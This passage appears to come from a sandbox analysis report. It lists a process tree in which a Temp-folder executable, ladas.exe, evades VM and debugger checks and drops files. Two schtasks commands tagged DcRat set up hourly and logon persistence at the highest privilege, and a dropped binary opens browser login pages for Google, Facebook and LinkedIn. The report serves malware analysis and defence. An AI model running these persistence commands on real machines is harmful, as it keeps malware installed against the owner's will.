    PID:1220
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6aef9758,0x7fff6aef9768,0x7fff6aef9778
      4⤵
      PID:2832
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.linkedin.com/login
    3⤵
    PID:2544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17341460790373617593,15380725305271833539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
      4⤵
      PID:7020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
    3⤵
    PID:6496
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
      4⤵
      PID:6560
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6560.0.1105744681\614865357" -parentBuildID 20221007134813 -prefsHandle 1684 -prefMapHandle 1636 -prefsLen 20749 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {06c88c5b-42b2-4c8d-a859-28369eed3f47} 6560 "\\.\pipe\gecko-crash-server-pipe.6560" 1776 22e66cf8558 gpu
        5⤵
        
        PID:1800
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6560.1.971149927\310758375" -parentBuildID 20221007134813 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 21565 -prefMapSize 233496 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c830344d-b9f0-4c92-a14a-c4f052c261f3} 6560 "\\.\pipe\gecko-crash-server-pipe.6560" 2304 22e661da258 socket
        5⤵
        
        PID:7484
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6560.2.938428053\1817953138" -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 3100 -prefsLen 21603 -prefMapSize 233496 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {698d2995-7554-473b-88b3-7416b1958fe5} 6560 "\\.\pipe\gecko-crash-server-pipe.6560" 3096 22e6aad2858 tab
        5⤵
        
        PID:5256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
    3⤵
    PID:6756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6aef9758,0x7fff6aef9768,0x7fff6aef9778
      4⤵
      PID:6788
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:2
      4⤵
      PID:4908
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:8
      4⤵
      PID:6968
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:8
      4⤵
      PID:536
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:1
      4⤵
      PID:6632
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:1
      4⤵
      PID:5928
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4544 --field-trial-handle=1896,i,2196828178502027275,13595582207999166572,131072 /prefetch:1
      4⤵
      PID:7916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/login
    3⤵
    PID:7152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6d8c46f8,0x7fff6d8c4708,0x7fff6d8c4718
      4⤵
      PID:6060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,12408654014957002950,10748282246476352389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 /prefetch:3
      4⤵
      PID:4548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
    3⤵
    PID:6428
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
      4⤵
      PID:6320
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6320.0.928812834\1552458122" -parentBuildID 20221007134813 -prefsHandle 1692 -prefMapHandle 1684 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d31ba1b-7a00-4270-92ba-57f69fe1c55f} 6320 "\\.\pipe\gecko-crash-server-pipe.6320" 1792 1cfa7cd8358 gpu
        5⤵
        
        PID:3928
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6320.1.365852922\1721104888" -parentBuildID 20221007134813 -prefsHandle 1996 -prefMapHandle 1940 -prefsLen 17556 -prefMapSize 230321 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a85243ae-c848-4962-8ebd-e35976e735f9} 6320 "\\.\pipe\gecko-crash-server-pipe.6320" 2008 1cfa8145858 socket
        5⤵
        
        PID:8132
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3⤵
    PID:5232
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6aef9758,0x7fff6aef9768,0x7fff6aef9778
      4⤵
      PID:6656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1928,i,15102153154894757219,10174614883871620209,131072 /prefetch:2
      4⤵
      PID:7900
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1928,i,15102153154894757219,10174614883871620209,131072 /prefetch:8
      4⤵
      PID:7972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
    3⤵
    PID:3144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff6d8c46f8,0x7fff6d8c4708,0x7fff6d8c4718
      4⤵
      PID:1720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3106114923543734917,12165474957600497439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
      4⤵
      PID:7988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3106114923543734917,12165474957600497439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
      4⤵
      PID:7964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3106114923543734917,12165474957600497439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
      4⤵
      PID:7888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3106114923543734917,12165474957600497439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      PID:7276
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3106114923543734917,12165474957600497439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      PID:5044
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    3⤵
    PID:5900
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      4⤵
      PID:7392
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7392.0.645955602\2110769138" -parentBuildID 20221007134813 -prefsHandle 1708 -prefMapHandle 1700 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68a21441-90ae-4559-bdc3-f0a8b94c26f1} 7392 "\\.\pipe\gecko-crash-server-pipe.7392" 1796 1750e6d9558 gpu
        5⤵
        
        PID:624
- C:\Users\Admin\AppData\Local\Temp\1000597001\ladas.exe
  "C:\Users\Admin\AppData\Local\Temp\1000597001\ladas.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2096
- - C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\8BYG2SMj7EJRYJyb6Uht.exe
    "C:\Users\Admin\AppData\Local\Temp\jobA66bl8UWYbzcI7x\8BYG2SMj7EJRYJyb6Uht.exe"
    3⤵
    PID:7812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      PID:3168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:10084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
      4⤵
      PID:8488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:2436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
      4⤵
      PID:5736
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:2036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:5980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
      4⤵
      PID:2676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
      4⤵
      PID:9532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:4940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
      4⤵
      PID:5812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fff725246f8,0x7fff72524708,0x7fff72524718
        5⤵
        
        PID:9816
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
      4⤵
      PID:7568
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff72129758,0x7fff72129768,0x7fff72129778
        5⤵
        
        PID:9660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:2
        5⤵
        
        PID:7508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1900 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:8
        5⤵
        
        PID:10060
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2868 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:10068
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:10140
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:8
        5⤵
        
        PID:10120
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3792 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:9124
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4196 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:6636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4948 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:9332
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4912 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:1
        5⤵
        
        PID:2084
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:8
        5⤵
        
        PID:9432
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5468 --field-trial-handle=1796,i,11098898145417502791,16545009867907811431,131072 /prefetch:8
        5⤵
        
        PID:2680
